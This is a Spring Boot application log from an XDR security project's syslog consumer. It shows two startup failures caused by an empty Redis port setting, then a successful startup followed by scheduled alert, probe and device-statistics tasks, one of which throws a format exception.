nanChen/ai-security-xdr
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
5fe0e124bbbd55118fbdd6369b5870ef7dec69fa
ai-security-xdr/haobang-security-dm/logs/syslog-consumer.log
T

1388 lines
190 KiB
Plaintext
Raw Normal View History

1、新增功能探针联动处置、心跳在线检测
2026-05-28 14:30:06 +08:00
2026-05-19 11:26:13.059 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
2026-05-19 11:26:13.058 [main] INFO com.syslogApplication - Starting syslogApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 17592 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
2026-05-19 11:26:13.066 [main] INFO com.syslogApplication - No active profile set, falling back to 1 default profile: "default"
2026-05-19 11:26:15.578 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:26:15.581 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:26:16.079 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 493 ms. Found 1 Elasticsearch repository interfaces.
2026-05-19 11:26:16.084 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:26:16.084 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:26:16.190 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
2026-05-19 11:26:16.190 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 105 ms. Found 0 Reactive Elasticsearch repository interfaces.
2026-05-19 11:26:16.204 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:26:16.205 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
2026-05-19 11:26:16.316 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
2026-05-19 11:26:16.317 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 105 ms. Found 0 Redis repository interfaces.
2026-05-19 11:26:16.980 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8089 (http)
2026-05-19 11:26:16.988 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8089"]
2026-05-19 11:26:16.988 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
2026-05-19 11:26:16.988 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
2026-05-19 11:26:17.159 [main] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring embedded WebApplicationContext
2026-05-19 11:26:17.160 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 3997 ms
2026-05-19 11:26:17.216 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogApplication.dmColumnService
2026-05-19 11:26:19.939 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 11:26:20.392 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
2026-05-19 11:26:20.404 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
2026-05-19 11:26:20.419 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
2026-05-19 11:26:20.421 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
2026-05-19 11:26:20.472 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
2026-05-19 11:26:24.749 [main] WARN o.s.b.w.s.c.AnnotationConfigServletWebServerApplicationContext - Exception encountered during context initialization - cancelling refresh attempt: org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'realtimeAnalysisScheduler': Unsatisfied dependency expressed through field 'ruleExecutionTimeService'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'ruleExecutionTimeServiceImpl': Unsatisfied dependency expressed through field 'redisTemplate'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'stringRedisTemplate' defined in class path resource [org/springframework/boot/autoconfigure/data/redis/RedisAutoConfiguration.class]: Unsatisfied dependency expressed through method 'stringRedisTemplate' parameter 0; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'org.springframework.boot.autoconfigure.data.redis.LettuceConnectionConfiguration': Unsatisfied dependency expressed through constructor parameter 0; nested exception is org.springframework.boot.context.properties.ConfigurationPropertiesBindException: Error creating bean with name 'spring.redis-org.springframework.boot.autoconfigure.data.redis.RedisProperties': Could not bind properties to 'RedisProperties' : prefix=spring.redis, ignoreInvalidFields=false, ignoreUnknownFields=true; nested exception is org.springframework.boot.context.properties.bind.BindException: Failed to bind properties under 'spring.redis.port' to int
2026-05-19 11:26:24.752 [main] INFO o.a.catalina.core.StandardService - Stopping service [Tomcat]
2026-05-19 11:26:24.764 [main] INFO o.s.b.a.l.ConditionEvaluationReportLoggingListener -
Error starting ApplicationContext. To display the conditions report re-run your application with 'debug' enabled.
2026-05-19 11:26:24.784 [main] ERROR o.s.b.d.LoggingFailureAnalysisReporter -
***************************
APPLICATION FAILED TO START
***************************
Description:
Failed to bind properties under 'spring.redis.port' to int:
Property: spring.redis.port
Value: ""
Origin: class path resource [application.properties] - 89:0
Reason: failed to convert java.lang.String to int (caused by java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type)
Action:
Update your application's configuration
2026-05-19 11:27:26.355 [main] INFO com.syslogApplication - Starting syslogApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 5536 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
2026-05-19 11:27:26.355 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
2026-05-19 11:27:26.360 [main] INFO com.syslogApplication - No active profile set, falling back to 1 default profile: "default"
2026-05-19 11:27:28.429 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:27:28.431 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:27:28.968 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 532 ms. Found 1 Elasticsearch repository interfaces.
2026-05-19 11:27:28.973 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:27:28.973 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:27:29.068 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
2026-05-19 11:27:29.068 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 95 ms. Found 0 Reactive Elasticsearch repository interfaces.
2026-05-19 11:27:29.080 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:27:29.080 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
2026-05-19 11:27:29.190 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
2026-05-19 11:27:29.192 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 104 ms. Found 0 Redis repository interfaces.
2026-05-19 11:27:29.806 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8089 (http)
2026-05-19 11:27:29.814 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8089"]
2026-05-19 11:27:29.814 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
2026-05-19 11:27:29.814 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
2026-05-19 11:27:29.977 [main] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring embedded WebApplicationContext
2026-05-19 11:27:29.978 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 3541 ms
2026-05-19 11:27:30.021 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogApplication.dmColumnService
2026-05-19 11:27:32.528 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 11:27:33.016 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
2026-05-19 11:27:33.028 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
2026-05-19 11:27:33.043 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
2026-05-19 11:27:33.045 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
2026-05-19 11:27:33.092 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
2026-05-19 11:27:37.635 [main] WARN o.s.b.w.s.c.AnnotationConfigServletWebServerApplicationContext - Exception encountered during context initialization - cancelling refresh attempt: org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'realtimeAnalysisScheduler': Unsatisfied dependency expressed through field 'ruleExecutionTimeService'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'ruleExecutionTimeServiceImpl': Unsatisfied dependency expressed through field 'redisTemplate'; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'stringRedisTemplate' defined in class path resource [org/springframework/boot/autoconfigure/data/redis/RedisAutoConfiguration.class]: Unsatisfied dependency expressed through method 'stringRedisTemplate' parameter 0; nested exception is org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'org.springframework.boot.autoconfigure.data.redis.LettuceConnectionConfiguration': Unsatisfied dependency expressed through constructor parameter 0; nested exception is org.springframework.boot.context.properties.ConfigurationPropertiesBindException: Error creating bean with name 'spring.redis-org.springframework.boot.autoconfigure.data.redis.RedisProperties': Could not bind properties to 'RedisProperties' : prefix=spring.redis, ignoreInvalidFields=false, ignoreUnknownFields=true; nested exception is org.springframework.boot.context.properties.bind.BindException: Failed to bind properties under 'spring.redis.port' to int
2026-05-19 11:27:37.638 [main] INFO o.a.catalina.core.StandardService - Stopping service [Tomcat]
2026-05-19 11:27:37.651 [main] INFO o.s.b.a.l.ConditionEvaluationReportLoggingListener -
Error starting ApplicationContext. To display the conditions report re-run your application with 'debug' enabled.
2026-05-19 11:27:37.671 [main] ERROR o.s.b.d.LoggingFailureAnalysisReporter -
***************************
APPLICATION FAILED TO START
***************************
Description:
Failed to bind properties under 'spring.redis.port' to int:
Property: spring.redis.port
Value: ""
Origin: class path resource [application.properties] - 89:0
Reason: failed to convert java.lang.String to int (caused by java.lang.IllegalArgumentException: A null value cannot be assigned to a primitive type)
Action:
Update your application's configuration
2026-05-19 11:28:16.634 [main] INFO com.syslogApplication - Starting syslogApplication using Java 1.8.0_121 on LAPTOP-ARDUR3N0 with PID 29920 (E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr\syslog-consumer\target\classes started by chenc in E:\GIT_GOSAME\ai-security-xdr\haobang-security-xdr)
2026-05-19 11:28:16.636 [background-preinit] INFO o.h.validator.internal.util.Version - HV000001: Hibernate Validator 6.2.5.Final
2026-05-19 11:28:16.638 [main] INFO com.syslogApplication - No active profile set, falling back to 1 default profile: "default"
2026-05-19 11:28:18.835 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:28:18.837 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:28:19.294 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 451 ms. Found 1 Elasticsearch repository interfaces.
2026-05-19 11:28:19.299 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:28:19.299 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Reactive Elasticsearch repositories in DEFAULT mode.
2026-05-19 11:28:19.404 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Reactive Elasticsearch - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Reactive Elasticsearch repository, consider annotating your entities with one of these annotations: org.springframework.data.elasticsearch.annotations.Document (preferred), or consider extending one of the following types with your repository: org.springframework.data.elasticsearch.repository.ReactiveElasticsearchRepository
2026-05-19 11:28:19.404 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 104 ms. Found 0 Reactive Elasticsearch repository interfaces.
2026-05-19 11:28:19.415 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Multiple Spring Data modules found, entering strict repository configuration mode
2026-05-19 11:28:19.416 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Bootstrapping Spring Data Redis repositories in DEFAULT mode.
2026-05-19 11:28:19.530 [main] INFO o.s.d.r.c.RepositoryConfigurationExtensionSupport - Spring Data Redis - Could not safely identify store assignment for repository candidate interface com.common.service.AppLogRepository; If you want this repository to be a Redis repository, consider annotating your entities with one of these annotations: org.springframework.data.redis.core.RedisHash (preferred), or consider extending one of the following types with your repository: org.springframework.data.keyvalue.repository.KeyValueRepository
2026-05-19 11:28:19.530 [main] INFO o.s.d.r.c.RepositoryConfigurationDelegate - Finished Spring Data repository scanning in 106 ms. Found 0 Redis repository interfaces.
2026-05-19 11:28:20.136 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat initialized with port(s): 8089 (http)
2026-05-19 11:28:20.144 [main] INFO o.a.coyote.http11.Http11NioProtocol - Initializing ProtocolHandler ["http-nio-8089"]
2026-05-19 11:28:20.145 [main] INFO o.a.catalina.core.StandardService - Starting service [Tomcat]
2026-05-19 11:28:20.145 [main] INFO o.a.catalina.core.StandardEngine - Starting Servlet engine: [Apache Tomcat/9.0.65]
2026-05-19 11:28:20.347 [main] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring embedded WebApplicationContext
2026-05-19 11:28:20.348 [main] INFO o.s.b.w.s.c.ServletWebServerApplicationContext - Root WebApplicationContext: initialization completed in 3629 ms
2026-05-19 11:28:20.413 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: private static com.common.service.DmColumnService com.syslogApplication.dmColumnService
2026-05-19 11:28:23.042 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 11:28:23.494 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.insert] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Insert]
2026-05-19 11:28:23.505 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.update] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.Update]
2026-05-19 11:28:23.518 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.deleteById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.DeleteById]
2026-05-19 11:28:23.522 [main] WARN c.b.m.core.injector.AbstractMethod - [com.common.mapper.DeviceCollectTaskMapper.selectById] Has been loaded by XML or SqlProvider or Mybatis's Annotation, so ignoring this injection for [class com.baomidou.mybatisplus.core.injector.methods.SelectById]
2026-05-19 11:28:23.570 [main] ERROR c.b.m.core.MybatisConfiguration - mapper[com.common.mapper.SecExceptionAlgorithmMapper.findById] is ignored, because it exists, maybe from xml file
2026-05-19 11:28:29.778 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== 初始化实时分析调度器 ==========
2026-05-19 11:28:29.812 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Starting...
2026-05-19 11:28:30.487 [main] INFO com.zaxxer.hikari.HikariDataSource - HikariPool-SyslogConsumer - Start completed.
2026-05-19 11:28:30.680 [main] INFO c.c.s.RealtimeAnalysisScheduler - 查询到 1 个实时分析规则
2026-05-19 11:28:36.520 [main] INFO c.c.s.i.RuleExecutionTimeServiceImpl - 初始化规则执行时间,ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble, nextExecuteTime=2026-05-19 11:38:00
2026-05-19 11:28:36.520 [main] INFO c.c.s.RealtimeAnalysisScheduler - 初始化规则: ruleId=4e134d65-1170-4d20-ab48-77f3fee6a765, ruleName=告警降噪分析规则-测试-V2, windowType=tumble
2026-05-19 11:28:36.520 [main] INFO c.c.s.RealtimeAnalysisScheduler - ========== 实时分析调度器初始化完成 ==========
2026-05-19 11:28:36.526 [main] INFO o.s.b.f.a.AutowiredAnnotationBeanPostProcessor - Autowired annotation is not supported on static fields: public static com.common.service.DeviceDeviceService com.common.service.AccessLogAlertService.deviceDeviceService
2026-05-19 11:28:36.549 [main] INFO c.c.service.AccessLogAlertService - 初始化AccessLogAlertService,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:28:36.769 [main] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:28:37.412 [main] INFO com.influx.InfluxDBClient - InfluxDB connection successful: ready for queries and writes
2026-05-19 11:28:37.599 [main] INFO com.common.util.MyBatisUtil - MyBatis 初始化成功
2026-05-19 11:28:38.335 [main] INFO org.quartz.impl.StdSchedulerFactory - Using default implementation for ThreadExecutor
2026-05-19 11:28:38.348 [main] INFO o.quartz.core.SchedulerSignalerImpl - Initialized Scheduler Signaller of type: class org.quartz.core.SchedulerSignalerImpl
2026-05-19 11:28:38.348 [main] INFO org.quartz.core.QuartzScheduler - Quartz Scheduler v.2.3.2 created.
2026-05-19 11:28:38.349 [main] INFO org.quartz.simpl.RAMJobStore - RAMJobStore initialized.
2026-05-19 11:28:38.350 [main] INFO org.quartz.core.QuartzScheduler - Scheduler meta-data: Quartz Scheduler (v2.3.2) 'quartzScheduler' with instanceId 'NON_CLUSTERED'
Scheduler class: 'org.quartz.core.QuartzScheduler' - running locally.
NOT STARTED.
Currently in standby mode.
Number of jobs executed: 0
Using thread pool 'org.quartz.simpl.SimpleThreadPool' - with 10 threads.
Using job-store 'org.quartz.simpl.RAMJobStore' - which does not support persistence. and is not clustered.
2026-05-19 11:28:38.350 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler 'quartzScheduler' initialized from an externally provided properties instance.
2026-05-19 11:28:38.350 [main] INFO org.quartz.impl.StdSchedulerFactory - Quartz scheduler version: 2.3.2
2026-05-19 11:28:38.350 [main] INFO org.quartz.core.QuartzScheduler - JobFactory set to: org.springframework.scheduling.quartz.SpringBeanJobFactory@cee1b4c
2026-05-19 11:28:38.565 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 11:28:38.565 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 11:28:38.565 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779161318563
2026-05-19 11:28:38.595 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka version: 3.4.0
2026-05-19 11:28:38.596 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka commitId: 2e1947d240607d53
2026-05-19 11:28:38.596 [main] INFO o.a.kafka.common.utils.AppInfoParser - Kafka startTimeMs: 1779161318595
2026-05-19 11:28:38.599 [main] INFO o.a.coyote.http11.Http11NioProtocol - Starting ProtocolHandler ["http-nio-8089"]
2026-05-19 11:28:38.622 [main] INFO o.s.b.w.e.tomcat.TomcatWebServer - Tomcat started on port(s): 8089 (http) with context path '/xdrservice'
2026-05-19 11:28:38.623 [main] INFO o.s.s.quartz.SchedulerFactoryBean - Starting Quartz Scheduler now
2026-05-19 11:28:38.623 [main] INFO org.quartz.core.QuartzScheduler - Scheduler quartzScheduler_$_NON_CLUSTERED started.
2026-05-19 11:28:38.644 [main] INFO com.syslogApplication - Started syslogApplication in 22.585 seconds (JVM running for 27.535)
2026-05-19 11:28:39.184 [org.springframework.kafka.KafkaListenerEndpointContainer#0-1-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: []
2026-05-19 11:28:39.221 [org.springframework.kafka.KafkaListenerEndpointContainer#0-0-C-1] INFO o.s.k.l.KafkaMessageListenerContainer - test-group-app: partitions assigned: [test-topic-0]
2026-05-19 11:28:53.756 [http-nio-8089-exec-1] INFO o.a.c.c.C.[.[.[/xdrservice] - Initializing Spring DispatcherServlet 'dispatcherServlet'
2026-05-19 11:28:53.756 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Initializing Servlet 'dispatcherServlet'
2026-05-19 11:28:53.758 [http-nio-8089-exec-1] INFO o.s.web.servlet.DispatcherServlet - Completed initialization in 2 ms
2026-05-19 11:29:00.012 [scheduling-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:29:00.012 [log-processor-1] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:29:00.230 [log-processor-1] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:29:00.259 [scheduling-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:29:00.890 [log-processor-1] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:29:00.900 [scheduling-2] INFO c.c.service.AccessLogAlertService - 没有发现新的日志数据,上次处理时间: 2026-05-19T11:27:36.549
2026-05-19 11:30:00.001 [scheduling-8] INFO c.c.s.ProbeStatusCheckScheduler - ========== 开始探针状态检查 ==========
2026-05-19 11:30:00.001 [scheduling-10] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:30:00.001 [scheduling-3] INFO c.c.s.AlarmHealthCheckScheduler - ========== 开始执行告警健康检查 ==========
2026-05-19 11:30:00.001 [log-processor-2] INFO c.c.service.AccessLogAlertService - 开始执行访问日志告警处理任务
2026-05-19 11:30:00.085 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备统计更新任务...
2026-05-19 11:30:00.166 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 设备统计更新完成,处理设备数:0,耗时:81ms
2026-05-19 11:30:00.167 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 开始执行设备采集探针任务时间更新,时间: 2026-05-19T11:30:00.167
2026-05-19 11:30:00.172 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - 开始批量更新设备采集任务时间,当前时间: 2026-05-19T11:30:00.171
2026-05-19 11:30:00.220 [scheduling-8] INFO c.c.s.ProbeStatusCheckScheduler - 探针状态检查完成,所有探针在线, 耗时: 217ms
2026-05-19 11:30:00.230 [scheduling-10] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:30:00.231 [log-processor-2] INFO c.c.service.AccessLogAlertService - 加载了 1 个启用的算法配置
2026-05-19 11:30:00.243 [scheduling-3] INFO c.c.service.AlarmHealthCheckService - 告警表 alarm_20260519 健康检查: 4小时内数据量=0, 状态=异常
2026-05-19 11:30:00.246 [scheduling-3] ERROR c.c.s.AlarmHealthCheckScheduler - 告警健康检查执行异常: d != java.lang.String
java.util.IllegalFormatConversionException: d != java.lang.String
at java.util.Formatter$FormatSpecifier.failConversion(Formatter.java:4302)
at java.util.Formatter$FormatSpecifier.printInteger(Formatter.java:2793)
at java.util.Formatter$FormatSpecifier.print(Formatter.java:2747)
at java.util.Formatter.format(Formatter.java:2520)
at java.util.Formatter.format(Formatter.java:2455)
at java.lang.String.format(String.java:2940)
at com.common.service.AlarmHealthCheckService.generateAlarmNotification(AlarmHealthCheckService.java:119)
at com.common.service.AlarmHealthCheckService.performHealthCheck(AlarmHealthCheckService.java:48)
at com.common.schedule.AlarmHealthCheckScheduler.scheduledHealthCheck(AlarmHealthCheckScheduler.java:32)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.springframework.scheduling.support.ScheduledMethodRunnable.run(ScheduledMethodRunnable.java:84)
at org.springframework.scheduling.support.DelegatingErrorHandlingRunnable.run(DelegatingErrorHandlingRunnable.java:54)
at org.springframework.scheduling.concurrent.ReschedulingRunnable.run(ReschedulingRunnable.java:95)
at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
at java.util.concurrent.FutureTask.run(FutureTask.java:266)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.access$201(ScheduledThreadPoolExecutor.java:180)
at java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:293)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)
2026-05-19 11:30:00.246 [scheduling-3] INFO c.c.s.AlarmHealthCheckScheduler - ========== 告警健康检查任务结束 ==========
2026-05-19 11:30:00.365 [scheduling-8] INFO c.c.s.ProbeStatusCheckScheduler - 探针统计: 总数=1, 在线=1, 离线=0
2026-05-19 11:30:00.365 [scheduling-8] INFO c.c.s.ProbeStatusCheckScheduler - ========== 探针状态检查结束 ==========
2026-05-19 11:30:00.660 [scheduling-2] INFO c.c.s.DeviceCollectTaskUpdateService - 批量更新完成,总计: 48,已更新: 1
2026-05-19 11:30:00.660 [scheduling-2] INFO c.c.service.DeviceStatsUpdateService - 设备采集探针任务时间更新完成,耗时: 493ms
